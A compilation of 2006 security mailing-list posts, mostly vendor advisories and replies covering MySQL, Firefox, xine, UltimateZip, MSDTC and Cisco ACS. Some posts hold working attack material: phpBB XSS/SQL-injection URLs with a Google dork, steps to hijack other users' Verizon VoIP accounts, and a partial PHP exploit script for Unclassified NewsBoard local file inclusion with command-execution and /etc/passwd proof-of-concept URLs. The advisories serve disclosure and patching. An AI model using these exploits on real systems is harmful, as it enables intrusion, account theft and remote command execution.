[ GLSA 200605-13 ] MySQL: Information leakage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200605-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: MySQL: Information leakage Date: May 11, 2006 Bugs: #132146 ID: 200605-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A MySQL server may leak information to unauthorized users. Background == MySQL is a popular multi-threaded, multi-user SQL database server. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-db/mysql < 4.1.19 >= 4.1.19 Description === The processing of the COM_TABLE_DUMP command by a MySQL server fails to properly validate packets that arrive from the client via a network socket. Impact == By crafting specific malicious packets an attacker could gather confidential information from the memory of a MySQL server process, for example results of queries by other users or applications. By using PHP code injection or similar techniques it would be possible to exploit this flaw through web applications that use MySQL as a database backend. Note that on 5.x versions it is possible to overwrite the stack and execute arbitrary code with this technique. Users of MySQL 5.x are urged to upgrade to the latest available version. Workaround == There is no known workaround at this time. Resolution == All MySQL users should upgrade to the latest version. # emerge --sync # emerge --ask --oneshot --verbose ">=dev-db/mysql-4.1.19" References == [ 1 ] Original advisory http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2006-05/msg00041.html [ 2 ] CVE-2006-1516 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516 [ 3 ] CVE-2006-1517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200605-13.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
phpBB "charts.php" XSS and SQL-Injection
// phpBB "charts.php" (hack) XSS and SQL-Injection // - [~] Advisory by: LoK-Crew [-] Exploit: http://www.example.com/charts.php?action=vote&rate=1&id=[XSS] http://www.example.com/charts.php?action=vote&rate=1&id=[SQL] [-] Googledork: inurl:"charts.php" "powered by phpbb" [+] Visit: www.LoK-Crew.de
Verizon Voicewing and Linksys PAP2-VN
Product: Verizon voicewing combined with Linksys PAP2-VN Reported by: Haavar Valeur Status: Vendor unwilling to address the problem Reported: Mar 15, 2006 I found a way it is possible to make and receive calls from other Verizon accounts. The problem is that Verizon publishes encrypted configuration files containing the username and password. These files are published through tftp and http, and are publicly readable. A vulnerability is created because the PAP2-VN adapter trusts the web server to give it the correct file. The PAP2 adapter accepts and decrypts configuration files for other accounts if they are available at the URI where the adapter expects to find it's configuration file. The following steps can be made by anyone with a PAP2-VN adapter to access random users accounts: 1) Create a subnet that you are able to isolate from the internet 2) Block all TFTP access from the subnet to the Internet. This will make the adapter failover to http (I did not bother to set up a tftp server). 3) Redirect all HTTP request made from the subnet to a web server you control (possible with e.g. iptables) 4) Connect the PAP2 adapter to the subnet and wait for the adapter to try to get the config file. 5) Look in the web server access log or tcpdump to find what URL the PAP2 tries to access on the web server 6) The URL should contain the MAC address of the PAP2. Try finding another valid mac by changing one of the least significant digits, and download the file from verizons web server. 7) Rename the file you downloaded to the filename the PAP2 tried to access and put it on the web server so the PAP2 will download this file. 8) The PAP2 will download and decrypt this file containing the account information of the other user and connect to the SIP server. 9) Now you can make and receive calls from another account This has been tested a PAP2-VN with firmware v2.0.10 and Verizon Voicewing, but could apply to other vendors using this adapter.
Secunia Research: UltimateZip unacev2.dll Buffer Overflow Vulnerability
== Secunia Research 11/05/2006 - UltimateZip unacev2.dll Buffer Overflow Vulnerability - == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * UltimateZip version 2.7.1, 3.0.3, and 3.1b. Other versions may also be affected. == 2) Severity Rating: Moderately Critical Impact: System Access Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in UltimateZip, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive. The vulnerability is related to: SA16479 == 4) Solution Do not extract ACE archives from untrusted sources. == 5) Time Table 26/04/2006 - Initial vendor notification. 27/04/2006 - Second vendor notification. 04/05/2006 - Third vendor notification. 11/05/2006 - Public disclosure. (No reply from vendor) == 6) Credits Discovered by Secunia Research. == 7) References SA16479: http://secunia.com/advisories/16479/ The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2005-2856 for the vulnerability. == 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-29/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Microsoft MSDTC NdrAllocate Validation Vulnerability
McAfee, Inc. McAfee Avert Labs Security Advisory Public Release Date: 2006-05-09 Microsoft MSDTC NdrAllocate Validation Vulnerability CVE-2006-0034 __ Synopsis There is an RPC procedure within the MSDTC interface in msdtcprx.dll that may be called remotely without user credentials in such a way that triggers a denial-of-service in the Distributed Transaction Coordinator (MSDTC) service. Exploitation can at most lead to a denial of service and therefore the risk factor is at medium. __ Vulnerable Systems Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows Server 2003 __ Vulnerability Information The msdtcprx.dll shared library contains RPC procedures for use with the Distributed Transaction Coordinator (MSDTC) service utilized in Microsoft Windows. By sending a large (greater than 4k) request to BuildContextW(), a size check can be bypassed and a bug in NdrAllocate() may be reached. This vulnerability was reported to Microsoft on October 12, 2005 __ Resolution Microsoft has provided a patch for this issue. Please see their bulletin, KB913580, for more information on obtaining and installing the patch. __ Credits This vulnerability was discovered by Chen Xiaobo of McAfee Avert Labs. __ __ Legal Notice Copyright (C) 2006 McAfee, Inc. The information contained within this advisory is provided for the convenience of McAfees customers, and may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way. McAfee makes no representations or warranties regarding the accuracy of the information referenced in this document, or the suitability of that information for your purposes. McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee, Inc. and/or its affiliated companies in the United States and/or other Countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners. __
[SECURITY] [DSA 1055-1] New Mozilla Firefox packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1055-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze May 11th, 2006 http://www.debian.org/security/faq - -- Package: mozilla-firefox Vulnerability : programming error Problem type : remote Debian-specific: no CVE ID : CVE-2006-1993 CERT advisory : VU#866300 BugTraq ID : 17671 Martijn Wargers and Nick Mott described crashes of Mozilla due to the use of a deleted controller context. In theory this could be abused to execute malicious code. Since Mozilla and Firefox share the same codebase, Firefox may be vulnerable as well. For the stable distribution (sarge) this problem has been fixed in version 1.7.8-1sarge7. For the unstable distribution (sid) this problem has been fixed in version 1.5.dfsg+1.5.0.3-1. We recommend that you upgrade your Mozilla Firefox packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7.dsc Size/MD5 checksum: 1001 b182197490af4a8c07faa21ec3178291 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7.diff.gz Size/MD5 checksum: 382272 eae0832fc7a4d408c33ff598859b95c3 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d Alpha architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7_alpha.deb Size/MD5 checksum: 11170108 35d0f530d00b9760f9b37b6d59a7b98c http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge7_alpha.deb Size/MD5 checksum: 168254 27b2e718d091dcff900a878dd352e2eb http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge7_alpha.deb Size/MD5 checksum:60066 c8f22cf9f8971e69e6cc69d52ceb033a AMD64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7_amd64.deb Size/MD5 checksum: 9401164 9b9f42d600ca975265e57c51e0fe420b http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge7_amd64.deb Size/MD5 checksum: 162980 ae57927c8905ca478c9aaac05fd77679 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge7_amd64.deb Size/MD5 checksum:58588 bbe086cded328a79afc3a5b5e04f1447 ARM architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7_arm.deb Size/MD5 checksum: 8220434 d63fdf2bc771e7903e18fc95c03d21b4 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge7_arm.deb Size/MD5 checksum: 154458 10bee95fe87228a9107215d643b68cf7 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge7_arm.deb Size/MD5 checksum:53918 3a1ffa2d6a7e115bc1e778dd0077044a Intel IA-32 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7_i386.deb Size/MD5 checksum: 8896786 b4905b847321b7731c1288c9d0122789 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge7_i386.deb Size/MD5 checksum: 158256 476a15b546d7b1254cc008cb1a844ef3 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge7_i386.deb Size/MD5 checksum:55464 fb9c72d1b12b5aa5d2dc361b77726cd7 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7_ia64.deb Size/MD5 checksum: 11629186 3e1248f0329f167f5bc8eed406b06420 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge7_ia64.deb Size/MD5 checksum: 168566 330d75c658d1223910417aee513d5a23 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge7_ia64.deb
[TZO-042006] Insecure Auto-Update and File execution (2)
Dear List, As my advisory has been a bit unclear in certain regards, I would like to clarify a few questions I have received briefly : - The Auto update problem with Zango Adware remains, there was no fix. - The Adware component is distributed by over 10.000 affilates everyday and I expect it to be installed on millions of workstations (IMO). - If you compromise (or alter) a DNS server this gives immediate access to internal client machines. The impact as citing Kevin F. is : "Dns server pwnage and then mass client ownage" -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
Unclassified NewsBoard <= 1.6.1 patch 1 ABBC[Config][smileset] arbitrary local inclusion
#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n"; if ($argc<6) { echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to UNB\r\n"; echo "cmd: a shell command\r\n"; echo "user/pass: you need a valid user account to upload files\r\n"; echo "Options:\r\n"; echo " -p[port]:specify a port other than 80\r\n"; echo " -P[ip:port]: specify a proxy\r\n"; echo "Examples:\r\n"; echo "php ".$argv[0]." localhost /unb/ your_username password cat ./../board.conf.php\r\n"; echo "php ".$argv[0]." localhost /unb/ your_username password ls -la -p81\r\n"; echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n"; die; } /* software site: http://newsboard.unclassified.de/ description: "The Unclassified NewsBoard (short UNB) is an open-source, PHP-based internet bulletin board system" vulnerable code in unb_lib/abbc.conf.php at lines 635-641: ... // Smiley Definitions if ($ABBC['Config']['smileset']) { $ABBC['Config']['smilepath'] = dirname(__FILE__) . '/designs/_smile/' . $ABBC['Config']['smileset'] . '/'; $ABBC['Config']['smileurl'] = $UNB['LibraryURL'] . 'designs/_smile/' . $ABBC['Config']['smileset'] . '/'; @include($ABBC['Config']['smilepath'] . 'config.php'); } ... $ABBC['Config']['smileset'] var is not initialized before to be used to include files. You cannot have access to this code directly but in unb_lib/abbc.css.php at line 16 we have: ... require('abbc.conf.php'); ... this script is not protected by the unb_lib folder .htaccess file: # Don't allow direct PHP requests in this directory Order allow,deny Deny from all Order allow,deny Deny from all so, if register_globals = On & magic_quotes_gpc = Off, you can include files from local resources, poc: http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../../../../../../../../etc/passwd%00 http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/avatar_[user_id].jpeg%00&cmd=ls%20-la http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/photo_[user_id].jpeg%00&cmd=ls%20-la this script try to include an avatar or photo with malicious php code inside, you need a valid account to upload files */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $username=$argv[3]; $pass=$argv[4]; $cmd="";$port=80;$proxy=""; for ($i=5; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} echo "step 0 -> check if suntzu.php is already installed...\r\n"; $packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=".$cmd.";\r\n"; $packet.="Connection: Close\r\n\r\n";
Re: Oracle - the last word
David Litchfield said: >When Oracle 10g Release 1 was released you could spend a day looking >for bugs and find thirty. When 10g Release 2 was released I had to >spend two weeks looking to find the same number. This increasing level of effort is likely happening for other major widely audited software products, too. It would be a very useful data point if researchers could publicly quantify how much time and effort they needed to find the issues (note: this is not my idea, it came out of various other discussions.) Level of effort might provide a more concrete answer to the question "how secure is software X?" Some researchers might not want to publicize this kind of information, but this would be one great way to help us move away from the primitive practice of counting the number of reported vulnerabilities. (and while I'm talking about quantifying researcher effort, it might be highly illustrative to measure how much time is spent in dealing with vendors during disclosure.) - Steve
[ MDKSA-2006:085 ] - Updated xine-ui packages fix format string vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:085 http://www.mandriva.com/security/ ___ Package : xine-ui Date: May 10, 2006 Affected: 2006.0, Corporate 3.0 ___ Problem Description: Multiple format string vulnerabilities in xiTK (xitk/main.c) in xine allow remote attackers to execute arbitrary code via format string specifiers in a long filename on an EXTINFO line in a playlist file. Packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1905 ___ Updated Packages: Mandriva Linux 2006.0: 650fe424e812f24ca55fbae9ac58f191 2006.0/RPMS/xine-ui-0.99.4-1.1.20060mdk.i586.rpm 93642d5dcbf76bdb55f6a1b79a82a740 2006.0/RPMS/xine-ui-aa-0.99.4-1.1.20060mdk.i586.rpm 233e02e5d13ea968b7497a67df0094a9 2006.0/RPMS/xine-ui-fb-0.99.4-1.1.20060mdk.i586.rpm f4b89ad1d813c792c5700861b360066f 2006.0/SRPMS/xine-ui-0.99.4-1.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 71e490c1d0941c5c93601968165af681 x86_64/2006.0/RPMS/xine-ui-0.99.4-1.1.20060mdk.x86_64.rpm 263a49cfbf4be6832af2f583b0e30ea8 x86_64/2006.0/RPMS/xine-ui-aa-0.99.4-1.1.20060mdk.x86_64.rpm 2f6a5637fd940883b8381491dc1fa403 x86_64/2006.0/RPMS/xine-ui-fb-0.99.4-1.1.20060mdk.x86_64.rpm f4b89ad1d813c792c5700861b360066f x86_64/2006.0/SRPMS/xine-ui-0.99.4-1.1.20060mdk.src.rpm Corporate 3.0: 19461fcb7b20d100d804d59a156d47e9 corporate/3.0/RPMS/xine-ui-0.9.23-3.3.C30mdk.i586.rpm e72a7090b1027ffd1d051785ba638d2b corporate/3.0/RPMS/xine-ui-aa-0.9.23-3.3.C30mdk.i586.rpm 9f735f80528fbe7645819b8c7ee1392e corporate/3.0/RPMS/xine-ui-fb-0.9.23-3.3.C30mdk.i586.rpm 70b43223c2a42e044cc92e6721b9c074 corporate/3.0/SRPMS/xine-ui-0.9.23-3.3.C30mdk.src.rpm Corporate 3.0/X86_64: 40d8285c71ff0b1c6649576ba98bb1d3 x86_64/corporate/3.0/RPMS/xine-ui-0.9.23-3.3.C30mdk.x86_64.rpm a8ed9fe1599138cfa39dc8a748bbcb3d x86_64/corporate/3.0/RPMS/xine-ui-aa-0.9.23-3.3.C30mdk.x86_64.rpm 53a46955f3dff408ff65995043ec30da x86_64/corporate/3.0/RPMS/xine-ui-fb-0.9.23-3.3.C30mdk.x86_64.rpm 70b43223c2a42e044cc92e6721b9c074 x86_64/corporate/3.0/SRPMS/xine-ui-0.9.23-3.3.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEYiyXmqjQ0CJFipgRApTHAKDtzmh1uicPEuGbvPLc5Gr6wM+hJgCg22Zd VHvcUKcFBGTsmikARwjTa2c= =i4ob -END PGP SIGNATURE-
Re: vbulletin security Alert
Testing this on a vBulletin 3.5.x-dev build all that I was able to produce was HTML output, no arbitrary PHP code was executed. You can test this by simply inserting into a template nothing appears. If there are more steps please do provide them.
RE: SYMSA-2006-003: Cisco Secure ACS for Windows - AdministratorPassword Disclosure
Hi Greg, No, the ACS Solution Engine (aka appliance) is not vulnerable. Thanks, John -Original Message- From: Greg owens [mailto:[EMAIL PROTECTED] Sent: Monday, May 08, 2006 6:45 PM To: Matthew Cerha (mcerha); bugtraq@securityfocus.com Cc: [EMAIL PROTECTED]; psirt (mailer list) Subject: Re: SYMSA-2006-003: Cisco Secure ACS for Windows - AdministratorPassword Disclosure Does this include the ACS appliance engine. Greg Owens, CCNP CCSP CISSP Email:[EMAIL PROTECTED] -- Sent from my Samsung I730 Wireless Handheld -Original Message- >From: "Matthew Cerha"<[EMAIL PROTECTED]> >Sent: 5/8/06 6:15:58 PM >To: "bugtraq@securityfocus.com" >Cc: "[EMAIL PROTECTED]"<[EMAIL PROTECTED]>, "psirt (mailer list)"<[EMAIL PROTECTED]> >Subject: Re: SYMSA-2006-003: Cisco Secure ACS for Windows - AdministratorPassword Disclosure >-BEGIN PGP SIGNED MESSAGE- >Hash: SHA1 > >Cisco Response >== > >This is Cisco PSIRT's response to the statements made by Symantec in >its advisory: SYMSA-2006-003, posted on May 8, 2006. > >The original email/advisory is available at: > >http://www.symantec.com/enterprise/research/SYMSA-2006-003.txt > >This issue is being tracked by Cisco Bug ID: > > * CSCsb67457 ( registered customers only) -- Cisco Secure ACS >Administrator Password Remote Retrieval and Decryption. > >We would like to thank Andreas Junestam and Symantec for reporting >this vulnerability to us. > >We greatly appreciate the opportunity to work with researchers on >security vulnerabilities, and welcome the opportunity to review and >assist in product reports. > >Additional Information >== > >Cisco Secure Access Control Server (ACS) provides centralized >identity management and policy enforcement for Cisco devices. > >CSCsb67457 ( registered customers only) -- Cisco Secure ACS >Administrator Password Remote Retrieval and Decryption. > >Symptom: > >A person with administrative access to the Windows registry of a >system running Cisco Secure ACS 3.x for Windows can decrypt the >passwords of all ACS administrators. > >Condition: > >Cisco Secure ACS 3.x for Windows stores the passwords of ACS >administrators in the Windows registry in an encrypted format. A >locally generated master key is used to encrypt/decrypt the ACS >administrator passwords. The master key is also stored in the Windows >registry in an encrypted format. Using Microsoft cryptographic >routines, it is possible for a user with administrative privileges to >a system running Cisco Secure ACS to obtain the clear-text version of >the master key. With the master key, the user can decrypt and obtain >the clear-text passwords for all ACS administrators. With >administrative credentials to Cisco Secure ACS, it is possible to >change the password for any locally defined users. This may be used >to gain access to network devices configured to use Cisco Secure ACS >for authentication. > >If remote registry access is enabled on a system running Cisco Secure >ACS, it is possible for a user with administrative privileges >(typically domain administrators) to exploit this vulnerability. > >If Cisco Secure ACS is configured to use an external authentication >service such as Windows Active Directory / Domains or LDAP, the >passwords for users stored by those services are not at risk to >compromise via this vulnerability. > >This vulnerability only affects version 3.x of Cisco Secure ACS for >Windows. Cisco Secure ACS for Windows 4.0.1 and Cisco Secure ACS for >UNIX are not vulnerable. Cisco Secure ACS 3.x appliances do not >permit local or remote Windows registry access and are not >vulnerable. > >Workaround: > >It is possible to mitigate this vulnerability by restricting access >to the registry key containing the ACS administrators' passwords. One >feature of Windows operating systems is the ability to modify the >permissions of a registry key to remove access even for local or >domain administrators. Using this feature, the registry key >containing the ACS administrators' passwords can be restricted to >only the Windows users with a need to maintain the ACS installation >or operate the ACS services. > >The following registry key and all of its sub-keys need to be >protected. > >HKEY_LOCAL_MACHINE\SOFTWARE\Cisco\CiscoAAAv3.3\CSAdmin\Administrators > >Note: The "CiscoAAAv3.3" portion of the registry key path may differ >slightly depending on the version of Cisco Secure ACS for Windows >that is installed. > >There are two general deployment scenarios for Cisco Secure ACS. The >Windows users that need permissions to the registry key will depend >on the deployment type. > > * If Cisco Secure ACS is n